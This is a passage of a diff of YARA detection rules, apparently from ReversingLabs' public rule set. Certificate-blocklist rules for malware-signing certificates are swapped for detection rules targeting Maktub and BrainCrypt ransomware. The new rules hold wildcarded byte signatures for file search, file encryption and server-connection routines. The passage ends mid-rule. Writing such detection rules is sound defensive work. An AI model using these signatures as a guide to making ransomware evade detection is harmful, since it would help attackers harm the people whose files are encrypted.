 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VAS CO PTY LTD" and pe.signatures [ i ] . serial == "02:8d:50:ae:0c:55:4b:49:14:8e:82:db:5b:1c:26:99" and 1579478400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files ) and ( $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_684F478C7259Dde0Cfe2260112Ca9846 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Maktub : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Maktub ransomware."
 		author = "ReversingLabs"
-		id = "840af428-47e0-529e-9db9-8ab9c968f2e3"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "23ca4232-77ff-5519-b6b0-ccec6cb35fe1"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3996-L4012"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "59654ba1df27029a04ef3b1a1bb54f6c15b727f2013923a11a729752b8829743"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Maktub.yara#L1-L116"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ee3213213e9521f7d19ce6340cd2f98057c22b1188ceefc30c17c18b6ec54e20"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Maktub"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D 8B ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 51 8D B3 ?? ?? ?? ?? 8B CB 56 E8 ?? ?? ?? ?? 85 C0 74 ?? 50 8B 43 ?? FF D0 8D
+            45 ?? C7 45 ?? ?? ?? ?? ?? 50 8B 43 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
+            B3 ?? ?? ?? ?? FF D0 85 C0 74 ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8B 43 ?? 6A
+            ?? 6A ?? 6A ?? 6A ?? FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF D0 85 C0 75 ?? FF 75 ?? 8B 43
+            ?? FF D0 5E 33 C0 5B 8B E5 5D C3 A1 ?? ?? ?? ?? 57 8B 7D ?? 85 C0 75 ?? FF 15 ?? ??
+            ?? ?? A3 ?? ?? ?? ?? 57 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ?? 85 C9 74
+            ?? 8B D1 33 C0 C1 E9 ?? F3 AB 8B CA 83 E1 ?? F3 AA 8B 7D ?? B9 ?? ?? ?? ?? 3B FE 76
+            ?? 8D 46 ?? 3B F8 73 ?? 8D 57 ?? 8D 70 ?? 8B FF 8A 06 8D 52 ?? 88 42 ?? 8D 76 ?? 49
+            75 ?? EB ?? 8B D7 2B D6 8A 06 8D 76 ?? 88 44 32 ?? 49 75 ?? E8 ?? ?? ?? ?? 89 83 ??
+            ?? ?? ?? 8D 4F ?? 8B 83 ?? ?? ?? ?? 89 47 ?? FF B3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 45 ?? FF 75 ?? 50 8B 43 ?? 57 6A ?? 6A ?? 6A ?? FF 75 ?? FF D0 85 C0 75 ?? A1
+            ?? ?? ?? ?? 85 C0 75 ?? A1 ?? ?? ?? ?? FF D0 A3 ?? ?? ?? ?? 57 6A ?? 50 FF 15 ?? ??
+            ?? ?? FF 75 ?? 8B 43 ?? FF D0 5F 5E 33 C0 5B 8B E5 5D C3 FF 75 ?? 8D 45 ?? 57 50 E8
+            ?? ?? ?? ?? 50 8D 8B ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? A1 ?? ?? ??
+            ?? 85 C0 75 ?? A1 ?? ?? ?? ?? FF D0 A3 ?? ?? ?? ?? 57 6A ?? 50 FF 15 ?? ?? ?? ?? FF
+            75 ?? 8B 43 ?? FF D0 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3
+        }
+		$search_files = {
+            55 8B EC 83 EC ?? 53 56 57 8B F9 68 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 85 C0 0F 84
+            ?? ?? ?? ?? 8B 47 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ??
+            FF D0 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 4F ?? 8D 45 ?? 50 0F 57 C0 53 66 0F 13 45
+            ?? FF D1 85 C0 0F 84 ?? ?? ?? ?? 8B 75 ?? 8B C6 0B 45 ?? 0F 84 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 6A ?? 50 8D 4D ?? C7 45 ?? ?? ?? ?? ?? FF
+            72 ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 87 ?? ?? ?? ??
+            8B 55 ?? 8D 4A ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? FF 70 ?? 50 FF 31 8D 4D ?? E8 ?? ??
+            ?? ?? 8B 45 ?? 83 C0 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 7F ?? A1 ?? ?? ?? ?? 85 C0 75 ??
+            FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 75 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 45 ?? 85 C0
+            7C ?? 7F ?? 81 FE ?? ?? ?? ?? 72 ?? 50 8B 45 ?? 56 53 8B 1D ?? ?? ?? ?? 33 F6 51 8D
+            48 ?? 89 65 ?? 39 31 7C ?? 51 8D 70 ?? FF D3 8B 4D ?? 8D 46 ?? 51 33 F6 89 65 ?? 89
+            01 8B 45 ?? 39 70 ?? 8D 48 ?? 7C ?? 51 8D 70 ?? FF D3 8B 4D ?? 8D 46 ?? 89 01 8B CF
+            E8 ?? ?? ?? ?? 8B 75 ?? 8B F8 E9 ?? ?? ?? ?? 8B 75 ?? 8B 47 ?? 6A ?? 6A ?? 6A ?? 6A
+            ?? 6A ?? 68 ?? ?? ?? ?? 56 FF D0 89 45 ?? 83 F8 ?? 75 ?? 8B 47 ?? 53 FF D0 33 FF E9
+            ?? ?? ?? ?? 51 8D 87 ?? ?? ?? ?? 8B CF 50 E8 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ??
+            ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? C7 45
+            ?? ?? ?? ?? ?? 51 FF 75 ?? 50 8B 47 ?? 53 FF D0 85 C0 75 ?? 8B 4D ?? E9 ?? ?? ?? ??
+            8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45 ??
+            ?? ?? ?? ?? 50 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 85 C0 74 ?? E8 ?? ?? ?? ??
+            8B 45 ?? 6A ?? 89 45 ?? 8D 45 ?? 50 8B 47 ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? FF D0
+            85 C0 75 ?? 8B 4D ?? EB ?? FF 75 ?? 8D 45 ?? 50 FF 75 ?? 8B 47 ?? 6A ?? 6A ?? 6A ??
+            FF 75 ?? FF D0 85 C0 75 ?? 8B 4D ?? EB ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF
+            75 ?? 8B 45 ?? 50 FF 75 ?? 8B 47 ?? FF D0 8B 4D ?? 85 C0 74 ?? 8B 45 ?? 3B 45 ?? 74
+            ?? E8 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 8B 47 ?? 53 FF D0 FF 75 ?? 8B 47 ?? FF D0
+            8B 47 ?? 56 FF D0 33 FF E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 FF 75
+            ?? 8B 47 ?? FF D0 8B 47 ?? 53 FF D0 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ??
+            ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ??
+            ?? ?? ?? 6A ?? 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 45
+            ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 85 C0 75 ??
+            8B 47 ?? 56 FF D0 33 FF EB ?? BF ?? ?? ?? ?? 83 C6 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ??
+            85 C0 7F ?? A1 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B 1D ?? ??
+            ?? ?? 56 6A ?? 50 FF D3 EB ?? 8B 47 ?? 53 FF D0 33 FF 8B 1D ?? ?? ?? ?? 8B 75 ?? 83
+            C6 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 7F ?? A1 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ??
+            ?? ?? ?? A3 ?? ?? ?? ?? 56 6A ?? 50 FF D3 8B C7 5F 5E 5B 8B E5 5D C2
+        }
+		$previous_encrypt_files = {
+            0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8D 4D
+            ?? 89 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF
+            77 ?? FF D3 8D 4D ?? 89 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6
+            0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0
+            8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D
+            4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ??
+            FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ??
+            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF
+            30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ??
+            ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89
+            B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6
+            0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0
+            8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D
+            4D ?? E8 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ?? 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7
+            ?? ?? ?? ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ??
+            ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7 ?? ?? ?? ?? FF D3 8B F0 8D
+            4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ?? 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7 ??
+            ?? ?? ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ??
+            ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7 ?? ?? ?? ?? FF D3 8B F0 8D 4D
+            ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ??
+            E8 ?? ?? ?? ?? FF 30 FF B7 ?? ?? ?? ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 6A ?? 8D B7 ?? ?? ?? ?? FF 30 8B 47 ?? 6A ?? 56 FF D0 85 C0 8D 4D ?? 0F 94 C3 E8
+            ?? ?? ?? ?? 84 DB 74 ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
+            FF 30 8B 47 ?? 6A ?? 56 FF D0 85 C0 8D 4D ?? 0F 94 C3 E8 ?? ?? ?? ?? 84 DB 0F 85 ??
+            ?? ?? ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC \"IP EM\"" and pe.signatures [ i ] . serial == "68:4f:47:8c:72:59:dd:e0:cf:e2:26:01:12:ca:98:46" and 1584981648 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $search_files and $previous_encrypt_files and $encrypt_files
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0B7C32208A954A483Dd102E1Be094867 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Braincrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects BrainCrypt ransomware."
 		author = "ReversingLabs"
-		id = "d16e74d8-2c46-508b-b518-a542603ca726"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "190798d5-594d-5b80-aa0e-8d7ff167f1c0"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4014-L4030"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "49e2208a7d2b5684283c1dfc9856f864d16b50f951f58e0252c97419819a46ec"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.BrainCrypt.yara#L1-L121"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "85866d6ffa136bf3ed27bbab55ae5430af4a1363930ebacab0df9ad24f8734cb"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "BrainCrypt"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$get_files_for_encryption_32 = {
+            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 80 7C 24
+            ?? ?? 74 ?? 8B 5C 24 ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? BB ?? ?? ?? ?? 89 5C 24 ??
+            E8 ?? ?? ?? ?? 83 C4 ?? C3 83 3D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 1D ?? ?? ?? ??
+            83 C3 ?? FC 8B 0B 89 0C 24 8B 4B ?? 89 4C 24 ?? 83 3D ?? ?? ?? ?? ?? 0F 86 ?? ?? ??
+            ?? 8B 1D ?? ?? ?? ?? 83 C3 ?? 8D 7C 24 ?? FC 8B 0B 89 0F 8B 4B ?? 89 4F ?? E8 ?? ??
+            ?? ?? 8B 5C 24 ?? 89 1D ?? ?? ?? ?? 8B 5C 24 ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 89 1D ??
+            ?? ?? ?? 8B 5C 24 ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? BB ?? ?? ?? ?? 89 5C 24 ?? E8
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 0C 24 8B 44 24 ?? C7 04 24 ?? ?? ?? ?? 89 4C 24 ?? 89
+            4C 24 ?? 89 44 24 ?? 89 44 24 ?? BB ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 5C 24 ?? FC 8B 0B 89 0C 24 8B 4B ?? 89 4C 24 ?? E8 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? BD ?? ?? ?? ?? 89 2C 24 89 5C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 0F 0B E8 ?? ?? ?? ?? 0F 0B E8 ?? ?? ?? ?? E9
+        }
+		$encrypt_file_32 = {
+            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 8B 5C 24
+            ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? 8B 44 24
+            ?? 89 54 24 ?? 89 14 24 89 4C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 44 24 ?? 8B 5C 24 ??
+            89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 54 24
+            ?? 8B 4C 24 ?? 8B 44 24 ?? 8B 5C 24 ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? 89 54 24 ??
+            89 54 24 ?? 89 4C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? C3 E8 ?? ?? ?? ?? E9
+        }
+		$attach_to_server_32 = {
+            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 31 DB 89
+            5C 24 ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 89 CF 83 F9 ??
+            0F 84 ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 89 4C 24 ?? 89 0C 24 83 3C 24 ?? 0F 84 ?? ??
+            ?? ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89
+            1C 24 83 3C 24 ?? 0F 84 ?? ?? ?? ?? BB ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 1C 24 83 3C 24 ?? 0F 84 ?? ?? ?? ?? BB ?? ?? ?? ??
+            89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 1C 24 83 3C 24 ??
+            0F 84 ?? ?? ?? ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B
+            44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 31 DB 89 5C 24 ?? 89 5C 24 ?? 31 ED 39 E8 0F 85
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 4C 24 ?? 89 0C 24 89 44 24 ?? 89 44 24
+            ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 48 ?? 8B 68
+            ?? 89 6C 24 ?? 89 6C 24 ?? 89 4C 24 ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 8D 59 ?? C7 04 24
+            ?? ?? ?? ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? C7 04 24 ?? ?? ??
+            ?? 8B 44 24 ?? 83 F8 ?? 74 ?? 83 C0 ?? 8D 7C 24 ?? FC 8B 08 89 0F 8B 48 ?? 89 4F ??
+            E8 ?? ?? ?? ?? 8D 5C 24 ?? FC 8B 0B 89 0C 24 8B 4B ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B
+            54 24 ?? 8B 4C 24 ?? 8B 44 24 ?? C7 04 24 ?? ?? ?? ?? 89 54 24 ?? 89 54 24 ?? 89 4C
+            24 ?? 89 4C 24 ?? 89 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 5C 24 ?? 8B
+            5C 24 ?? 89 5C 24 ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3
+        }
+		$get_files_for_encryption_64 = {
+            65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83
+            EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 0F B6 44 24 ?? 84 C0 0F 85 ?? ?? ?? ?? 48 8B 05
+            ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 83 F9 ?? 0F 86 ?? ?? ?? ?? 48 8B 48 ?? 48 8B 40
+            ?? 48 89 0C 24 48 89 44 24 ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 83 F9 ??
+            0F 86 ?? ?? ?? ?? 48 8B 48 ?? 48 8B 40 ?? 48 89 4C 24 ?? 48 89 44 24 ?? E8 ?? ?? ??
+            ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 89 0D ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 84 C9 0F 85
+            ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 04 24 48 8B 44 24 ?? 48 89 44
+            24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 04 24
+            48 8B 4C 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24 ?? 48 8D 05 ?? ??
+            ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B
+            4C 24 ?? 48 89 04 24 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 48 83 C4 ?? C3 48
+            8D 0D ?? ?? ?? ?? 48 89 0C 24 48 89 44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 0F 0B 48 8B 44 24 ?? 48 89 04 24 48 8B 44 24 ?? 48 89 44 24 ?? 48 8D 05 ?? ??
+            ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? E9
+        }
+		$attach_to_server_64 = {
+            65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83
+            EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 84 24 ?? ?? ??
+            ?? ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 04 24 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 89
+            7C 24 ?? 84 07 0F 57 C0 48 83 C7 ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? E8 ?? ?? ?? ?? 48
+            8B 6D ?? 48 8B 44 24 ?? 48 89 04 24 48 8B 4C 24 ?? 48 89 4C 24 ?? 48 8B 4C 24 ?? 48
+            89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 04 24 48 8D 0D ?? ?? ?? ?? 48 89 4C
+            24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 04 24 48 8D 0D
+            ?? ?? ?? ?? 48 89 4C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ??
+            48 89 04 24 48 8B 4C 24 ?? 48 89 4C 24 ?? 48 8B 4C 24 ?? 48 89 4C 24 ?? E8 ?? ?? ??
+            ?? 48 8B 44 24 ?? 48 8B 48 ?? 48 8B 10 48 8B 58 ?? 48 8B 40 ?? 48 39 CB 0F 87 ?? ??
+            ?? ?? 48 29 D9 48 29 D8 48 85 C0 0F 84 ?? ?? ?? ?? 48 C7 04 24 ?? ?? ?? ?? 48 01 DA
+            48 89 54 24 ?? 48 89 4C 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C
+            24 ?? 48 89 0C 24 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B
+            48 ?? 48 8B 50 ?? 84 01 48 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 48 83 C1 ?? 48 89 4C 24
+            ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 04 24 48 8B 44
+            24 ?? 48 8B 48 ?? 48 8B 40 ?? 48 89 4C 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44
+            24 ?? 48 8B 4C 24 ?? 48 89 04 24 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B
+            4C 24 ?? 48 8B 54 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24 ?? 48 89
+            54 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 89 44 24 ?? 48 89 8C 24 ??
+            ?? ?? ?? 90 E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 48 83 C4 ?? C3 90 E8 ?? ?? ?? ?? 48 8B 6C
+            24 ?? 48 83 C4 ?? C3 31 DB E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 0B E8 ?? ?? ?? ?? E9
+        }
+		$encrypt_file_64 = {
+            65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83
